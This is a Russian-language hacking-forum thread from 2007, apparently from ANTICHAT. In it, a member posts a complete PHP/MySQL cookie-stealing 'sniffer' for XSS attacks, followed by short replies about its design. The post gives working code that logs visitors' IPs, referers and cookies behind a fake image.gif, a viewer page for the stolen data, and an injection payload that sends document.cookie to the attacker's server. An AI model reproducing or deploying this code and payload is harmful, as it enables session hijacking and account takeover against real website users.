HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Sniffer _Pantera_ for Antichat
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sniffer _Pantera_ for Antichat
  #1  
Старый 28.05.2007, 19:35
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию Sniffer _Pantera_ for Antichat
Введение

При изучении атак вида XSS я столкнулся с проблемой - у меня небыло снифера. Я искал готовый снифер в интернете, но ничего дельного не нашел. Пообщавшись с юзерами античата мне дали дельный совет - снифер лутьше написать самому. Я так и сделал. Писал на php+mysql.


Начнем

Для начала создадим базу данных с именем sniffer
а после таблицу data
Цитата:
CREATE TABLE `data` (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`ip` TEXT NOT NULL ,
`referer` TEXT NOT NULL ,
`qu` TEXT NOT NULL ,
`cookie` TEXT NOT NULL
) ENGINE = MYISAM ;
Сразу после этого напишем config.php
PHP код:
<?php
  $dbhost "database";
  $dbuser "login";
  $dbpass "password";
  $dbname "sniffer";

  $db = @mysql_connect($dbhost$dbuser$dbpass);
  if (!$db) {
    exit ("<P>Сервер базы данных не доступен</P>" );
  }
  if (!@mysql_select_db($dbname$db)) {
    exit( "<P>База данных $dbname не доступна</P>" );
  }
?>
ps требует редактирования


Теперь создаем snif.php
PHP код:
<html>
<head>
<title>Sniffer _Pantera_ for Antichat</title>
</head>
<body>
<?
$ip UrlDecode(getenv('REMOTE_ADDR'));
$referer UrlDecode(getenv('HTTP_REFERER'));
$qu UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');


require_once("config.php");
$query "INSERT INTO `data` VALUES(NULL, '$ip', '$referer','$qu','$cookie')";
mysql_query($query$db);
mysql_close($db);
?>
</body>
</html>
ps Именно он будет добавлять записи в базу данных.

Теперь создадим .htaccess:
Цитата:
RewriteEngine On
RewriteRule image.gif snif.php
ps В папку с снифером поместите любой gif рисунок и переименуйте его в image.gif

И наконец создаем log.php
PHP код:
<html>
<head>
<title>Снифер _Pantera_ for Antichat</title>
</head>
<body>
<?php
include('config.php');
$query "SELECT * FROM `data` ORDER by `id` DESC";
$result mysql_query($query);

  while($perem mysql_fetch_array($result))
  {
echo "<TABLE WIDTH=100% BORDER=1><DIV style='margin-bottom: 15;'>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>ip</center></td><td>".$perem['ip']."</td></tr>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>referer</center></td><td>".$perem['referer']."</td></tr>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>query</center></td><td>".$perem['qu']."</td></tr>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>cookie</center></td><td>".$perem['cookie']."</td></tr></table>";

  }

?>
</body>
</html>
ps Этот файл будет считывать данные из базы данных и выводить их на экран в обратном порядке.

Ну вот собственно и все. Осталось теперь залить эти все файлы на хостинг с поддержкой php+mysql и использовать.

Использовние
Простой вызов по ссылке:
<a href="http://site.ru/image.gif?test">жми тут</a>

Вызов как картинки:
<img src="http://site.ru/image.gif">

Вызов из скрипта:
<script>img = new Image(); img.src = "http://site.ru/image.gif?"+document.cookie;</script>

Заключение
Хочу сказать парочку слов в заключение. Снифер написал для себя, и оформил его по своему вкусу. Если вам он понравиться буду обновлять. Главное пишите каким бы вы его хотели видеть.
C уважением _Pantera_ (С)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 28.05.2007, 19:38
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию
а разве без mysql ни как?
 
Ответить с цитированием

  #3  
Старый 28.05.2007, 19:39
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию
Я его писал на свой вкус, можно было сделать с txt-шником.
 
Ответить с цитированием

  #4  
Старый 28.05.2007, 23:55
Knight_of_Darkness
Познающий
Регистрация: 03.02.2007
Сообщений: 94
С нами: 10140806

Репутация: 165
По умолчанию
не знаю, по-моему мускуль в сниффере не нужен. ИМХО.
з.ы. рульная у тебя подпись, в точку.
 
Ответить с цитированием

  #5  
Старый 28.05.2007, 23:59
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию
Цитата:
не знаю, по-моему мускуль в сниффере не нужен. ИМХО.
каждый дрочит как хочет (с)
так что тут дело вкуса )
 
Ответить с цитированием

  #6  
Старый 29.05.2007, 00:22
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию
Ещё один..... куда их хоть столько, пип, юзаем каника и все в поряде, .....
плин один и тот-же куск кода в разной разметке =\

http://forum.antichat.ru/thread41026.html
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Sniffer CTTAPTAK Уязвимости 8 16.12.2006 23:57
What's up with the sniffer?! SWiSS Forum for discussion of ANTICHAT 3 13.04.2006 20:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.